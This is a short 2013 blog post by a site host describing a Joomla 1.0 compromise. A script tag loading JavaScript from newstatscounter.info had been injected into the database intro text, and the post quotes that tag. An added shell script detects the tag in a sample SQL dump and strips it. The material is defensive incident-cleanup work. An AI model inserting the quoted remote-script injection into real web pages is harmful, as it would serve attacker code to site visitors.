Friday, February 8, 2013

Joomla injection attack newstatcounter.info counter js

I 'manage', in the loosest sense, a website for a friend. I inherited it years ago, and only host it. I originally moved the system and left it at that.

I advised them then that the Joomla 1.0.x version was going EOL at the time and they needed to update or face getting hacked.

Tonight the inevitable happened, despite repeated warnings.

I Googled for this and found very little information, so I went for a dig about.

The first part was locating the problem, as the page redirects and it was hard to catch a page of source, but eventually I got it.

I thought it might be a hacked JS file. But on the page was the following link:

script type='text/javascript' src='http://newstatscounter.info/counter449.js'

So it was loading the JavaScript from the remote (bastards) server.

I had a look at a few pages, and then at the HTML and saw nothing. So I then had a peer in the MySQL database.

In the intro text, the line of code had been inserted prior to the standard HTML, and as it was a script, the editor never saw it.

The tricky part will be removing it from the tables, but as I have taken the site offline and told them it will not get back online until it is sorted, the easiest route will probably be to export the database and sed the data out.
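
The export-and-sed cleanup described above, as an added example that is not the author's own script: it counts and strips the injected tag from a mysqldump file and lists every remote script host in it. Assumptions: the constructed sample dump, the `jos_content`/`introtext` names, the full `<script ...></script>` form with mysqldump's `\'` quote escaping (the post shows the tag without its angle brackets), and matching both spellings of the host that appear in the post.

```shell
#!/usr/bin/env bash
# Added example: find and strip the injected <script> tag from a mysqldump export.
# Matches both host spellings seen in the post, with or without \' escaping.
PATTERN="<script[^>]*src=\\\\?['\"]https?://([a-z0-9-]+\\.)*newstats?counter\\.info/[^>]*>[[:space:]]*</script>"

# Number of injected tags in a dump file (0 when none are present).
count_injected() {
  { grep -oE "$PATTERN" "$1" || true; } | wc -l | tr -d ' '
}

# Every remote host referenced by a <script src=...> in the dump, with counts,
# so any other unexpected script source can be reviewed as well.
list_script_hosts() {
  { grep -oE "<script[^>]*src=\\\\?['\"]https?://[^/'\"\\\\]+" "$1" || true; } \
    | sed -E 's#.*://##' | sort | uniq -c | sort -rn
}

# Write a cleaned copy; the original dump is left untouched as evidence.
strip_injected() {
  sed -E "s#${PATTERN}##g" "$1" > "$2"
}

# Constructed sample dump (assumed table/column: jos_content.introtext).
make_sample() {
  cat > "$1" <<'EOF'
INSERT INTO `jos_content` (`id`,`title`,`introtext`) VALUES (1,'Welcome','<script type=\'text/javascript\' src=\'http://newstatscounter.info/counter449.js\'></script><p>Hello</p>');
INSERT INTO `jos_content` (`id`,`title`,`introtext`) VALUES (2,'News','<p>No injection here</p>');
INSERT INTO `jos_content` (`id`,`title`,`introtext`) VALUES (3,'Map','<script src=\'http://maps.example.org/api.js\'></script><script type=\'text/javascript\' src=\'http://newstatscounter.info/counter449.js\'></script><p>Find us</p>');
EOF
}

workdir=$(mktemp -d)
make_sample "$workdir/dump.sql"
echo "injected tags before: $(count_injected "$workdir/dump.sql")"
list_script_hosts "$workdir/dump.sql"
strip_injected "$workdir/dump.sql" "$workdir/clean.sql"
echo "injected tags after:  $(count_injected "$workdir/clean.sql")"
echo "remote script hosts remaining:"
list_script_hosts "$workdir/clean.sql"
```

Check the remaining host list for any remote script source you do not recognise before importing the cleaned copy.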

Anyway, thought for the day is 'when shit goes EOL, change it'

IMMEDIATELY :-)
